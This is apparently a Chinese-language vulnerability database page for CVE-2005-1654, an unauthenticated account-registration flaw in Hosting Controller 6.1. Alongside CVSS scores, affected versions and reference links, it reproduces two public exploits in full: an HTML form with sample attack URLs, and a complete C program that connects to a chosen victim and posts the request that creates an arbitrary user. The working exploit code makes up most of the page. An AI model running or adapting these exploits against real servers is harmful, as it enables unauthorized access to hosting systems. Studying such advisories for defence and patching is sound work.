CVE-2005-1654
CVSS7.5
发布时间 :2005-05-18 00:00:00
修订时间 :2008-09-05 16:49:43
NMCOE    

[原文]Hosting Controller 6.1 Hotfix 1.9 and earlier allows remote attackers to register arbitrary users via a direct request to addsubsite.asp with the loginname and password parameters set.


[CNNVD]Hosting Controller 漏洞(CNNVD-200505-1104)

        Hosting Controller 6.1 Hotfix 1.9及更早版本允许远程攻击者通过直接请求带有设置好的登录名和密码的addsubsite.asp来注册任意用户。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:hosting_controller:hosting_controller:6.1_hotfix_1.9
cpe:/a:hosting_controller:hosting_controller:6.1_hotfix_1.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1654
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1654
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1104
(官方数据源) CNNVD

- 其它链接及资源

http://isun.shabgard.org/hc3.txt
(PATCH)  MISC  http://isun.shabgard.org/hc3.txt
http://secunia.com/advisories/15271
(UNKNOWN)  SECUNIA  15271

- 漏洞信息

Hosting Controller 漏洞
高危 未知
2005-05-18 00:00:00 2005-10-20 00:00:00
远程  
        Hosting Controller 6.1 Hotfix 1.9及更早版本允许远程攻击者通过直接请求带有设置好的登录名和密码的addsubsite.asp来注册任意用户。

- 公告与补丁

        暂无数据

- 漏洞信息 (979)

Hosting Controller <= 0.6.1 Unauthenticated User Registration Exploit (EDBID:979)
windows remote
2005-05-04 Verified
0 Mouse
N/A [点击下载]
<!--
Tested 

google = intext:"powered by Hosting Controller" intitle:"Hosting Controller"

/str0ke

Advisory Information
-------------------------
Software Package   : Hosting Controller
Vendor Homepage  : http://www.hostingcontroller.com
Platforms               : Windows based servers
Vulnerability           : unauthenticated user registeration
Risk                       : High!
Vulnerable Versions: All version ( Tested on: v.6.1 Hotfix 1.9 )
Vendor Contacted   : 5/3/2005
Release Date          : 5/5/2005

Summary
------------
Hosting Controller is a complete array of Web hosting automation tools for
the Windows Server family platform.
This vulnerability is on the admin/hosting/addsubsite.asp
Attacker can create user and host on the target system.

Exploit
---------
A demonstration exploit URL is provided:

http://[target]/admin/hosting/addsubsite.asp?loginname=Mouse&password=123456
http://[target]:8077/hosting/addsubsite.asp?loginname=Mouse&password=123456
-->

<FORM action="http://[target]/admin/hosting/addsubsite.asp" method="post">
<INPUT type="hidden" name="reseller" value="resadmin" id="reseller" >
<INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
Domain:     <INPUT name="DomainName" value="shabgard.org" id="Hidden2"><BR>
Username: <INPUT name="loginname" value="Mouse" id="Hidden3"><BR>
<INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
<INPUT type="hidden" name="htype" value="27" id="htype" >
<INPUT type="hidden" name="choice" value="1" id="Hidden7" >
<INPUT type="hidden" name="mailaccess" value="TRUE" id="Hidden5">
Mailserver: <INPUT name="MailServerType" value="IMail" id="Hidden6"><BR>
Password:  <INPUT name="password" value="123456" id="Hidden8"><BR><BR>
<input type="submit" value="Make"><BR>

# milw0rm.com [2005-05-04]
		

- 漏洞信息 (987)

Hosting Controller <= 0.6.1 Unauthenticated User Registeration (2nd) (EDBID:987)
windows remote
2005-05-07 Verified
0 Silentium
N/A [点击下载]
/*****************************************************
*                                                    *
*  [Hosting Controller <= v6.1] exploit              *
*                                                    *
*  sileHOSTCxpl                                      *
*                                                    *
*  This exploit utilize two ways for exploiting      *
*  vulnerability present into Hosting Controller.    *
*  This exploit create new user with relative        *
*  passwd and registered your host with mail server  *
*  into Hosting Controller software ;\               *
*                                                    *
*  References: www.milw0rm.com/id.php?id=979         * 
*                                                    *
*  coded by: Silentium of Anacron Group Italy        *
*      date: 05/05/2005                              *
*    e-mail: anacrongroupitaly[at]autistici[dot]org  *
*   my_home: www.autistici.org/anacron.group-italy   *
*                                                    *
*  this tool is developed under GPL license          *
*  no(c) .:. copyleft                                *
*                                                    *
*****************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT1 80		// port of web server 
#define PORT2 8077		// port of hosting controller

void info(void);
void banner(void);
void sendxpl(FILE *out, char *argv[], int type);
void errsock(void);
void errgeth(void);
void errconn(char *argv[]);


int main(int argc, char *argv[]){

FILE *out;
int sock, sockconn, type;
struct sockaddr_in addr;
struct hostent *hp;

type = atoi(argv[6]);

if(argc!=7 || (type < 1) || (type > 2))
   info();

banner();
   
if((sock = socket(AF_INET,SOCK_STREAM,0)) < 0)
   errsock();
   
   printf("[*] Creating socket		[OK]\n");

if((hp = gethostbyname(argv[1])) == NULL)
   errgeth();
   
   printf("[*] Resolving victim host	[OK]\n");
   
memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;

if(type == 1)
   addr.sin_port = htons(PORT1);
else
   addr.sin_port = htons(PORT2);
   
sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));
if(sockconn < 0)
   errconn(argv);
   
   printf("[*] Connecting at victim host   [OK]\n");
   
out = fdopen(sock,"a");
setbuf(out,NULL);

sendxpl(out,argv,type);

if(type == 1)
   printf("[*] Now test your username and password\n" 
          "    on http://%s/admin/\n\n",argv[1]);
else
   printf("[*] Now test your username and password\n"
          "    on http://%s:8077\n\n",argv[1]);

shutdown(sock,2);
close(sock);

return 0;

}


void info(void){

system("clear");
printf("\n\t         #########################################\n"
       "\t         #             sileHOSTCxpl              #\n"
       "\t         #  ###################################  #\n"
       "\t         #          Hosting Controller           #\n"
       "\t         #           <= v6.1 exploit             #\n"
       "\t         #   Unauthenticated User Registration   #\n"
       "\t         #          coded by Silentium           #\n"            
       "\t         #        [ Anacron Group Italy ]        #\n"
       "\t         #  ###################################  #\n"
       "\t         # www.autistici.org/anacron-group-italy #\n"
       "\t         #########################################\n\n"
       " [Usage]\n\n" 
       "  sileHOSTCxpl <victim> <username> <password> <your_host> <mailserver> <type>\n\n"
       "        [Type]\n\n"
       "              1) web server daemon	   [port 80]\n"
       "              2) hosting controller daemon [port 8077]\n\n"
       " [Example]\n\n"
       "  sileHOSTCxpl www.victim.com sile silePass anacrongroup.org imail 1\n\n"); 
exit(1);

}


void banner(void){

system("clear");
printf("[-] sileHOSTCxpl\n"
       "    ============\n"
       "[-] Hosting Controller <= v6.1 exploit\n"
       "[-] coded by Silentium - Anacron Group Italy\n"
       "[-] www.autistici.org/anacron-group-italy\n\n");
       
}
       

void sendxpl(FILE *out, char *argv[], int type){

int size = 132;

size+=strlen(argv[2]);
size+=strlen(argv[3]);
size+=strlen(argv[4]);
size+=strlen(argv[5]);
    
if(type == 1)    
    fprintf(out,"POST /admin/hosting/addsubsite.asp HTTP/1.0\n"
                "Connection: Keep-Alive\n"
                "Pragma: no-cache\n"
                "Cache-control: no-cache\n"
                "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
                "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
                "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
                "Accept-Language: en\n"
                "Host: %s\n"
                "Content-Type: application/x-www-form-urlencoded\n"
                "Content-Length: %d\n\n"
                "reseller=resadmin&domaintypecheck=SECOND&DomainName=%s&loginname=%s&"
                "Quota=-1&htype=27&choice=1&mailaccess=TRUE&MailServerType=%s&password"
                "=%s",argv[1],size,argv[4],argv[2],argv[5],argv[3]); 
else
    fprintf(out,"POST /hosting/addsubsite.asp HTTP/1.0\n"
                "Connection: Keep-Alive\n"
                "Pragma: no-cache\n"
                "Cache-control: no-cache\n"
                "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
                "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
                "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
                "Accept-Language: en\n"
                "Host: %s\n"
                "Content-Type: application/x-www-form-urlencoded\n"
                "Content-Length: %d\n\n"
                "reseller=resadmin&domaintypecheck=SECOND&DomainName=%s&loginname=%s&"
                "Quota=-1&htype=27&choice=1&mailaccess=TRUE&MailServerType=%s&password"
                "=%s",argv[1],size,argv[4],argv[2],argv[5],argv[3]);
                                                                                                                                                                                                                                     
                                  
                 printf("[*] Sending exploit		[OK]\n\n");

}
            
                 
void errsock(void){

system("clear");
printf("[x] Creating socket	[FAILED]\n\n");
exit(1);

}


void errgeth(void){

printf("[x] Resolving victim host	[FAILED]\n\n");
exit(1);

}


void errconn(char *argv[]){

printf("[x] Connecting at victim host	[FAILED]\n\n",argv[1]);
exit(1);

}

// milw0rm.com [2005-05-07]
		

- 漏洞信息

16190
Hosting Controller addsubsite.asp Account Creation Security Bypass
Remote / Network Access
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-05-05 2005-01-02
2005-05-05 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站